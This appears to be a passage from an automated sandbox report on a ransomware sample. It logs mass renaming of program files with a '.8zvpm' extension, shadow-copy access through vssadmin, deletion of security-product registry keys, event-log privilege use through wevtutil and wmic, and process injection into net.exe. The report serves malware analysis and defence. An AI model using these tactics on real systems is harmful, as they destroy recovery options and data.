File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_dcgBmfxmWl00.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_C8hEF4maxwY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\FileSystemMetadata.xml.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JdLAFUBxR6A0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\28.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_o6Id7afySdo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YrL2geyrNdQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200_contrast-high.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_ed4FFgOCwYU0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Apply.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_7BdU5xsWnHE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache-Dark.scale-180.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Square310x310\PaintLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\en-US.PhoneNumber.SMS.ot C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Offihub_Base_PriInfo.pri.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\office.odf C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-64.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\TipTsf.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_vGlQbTDe_eA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHM.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_9e4IhdhiV-A0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSplashScreen.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3899_20x20x32.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_QFvrhcF9rnA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_lpix8Hdz0uM0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\11c.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_l9E0Jab9COg0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_rOY6T56VlLw0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-400.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\de-DE\rtscom.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_11c.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_tGR5Kj9ys-40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_g_TtoKPC3vE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_f3mmh6fc3Hs0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_8IYU2qy_QEI0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_h8pTF9MYoGY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSplashScreen.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_eYJru2nTx480.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\_Resources\4.rsrc C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleSplashScreen.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_x2hW4msd8_o0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3569_20x20x32.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_mtRDmiY2hfQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YkDFdXDizLE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_RC9Suxq_6jw0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\shape_hexagon.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2776 wrote to memory of 3152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2776 wrote to memory of 3152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 3688 wrote to memory of 1336 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3688 wrote to memory of 1336 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 1208 wrote to memory of 932 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1208 wrote to memory of 932 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2004 wrote to memory of 3164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2004 wrote to memory of 3164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 652 wrote to memory of 3972 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 652 wrote to memory of 3972 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 4012 wrote to memory of 3604 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4012 wrote to memory of 3604 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
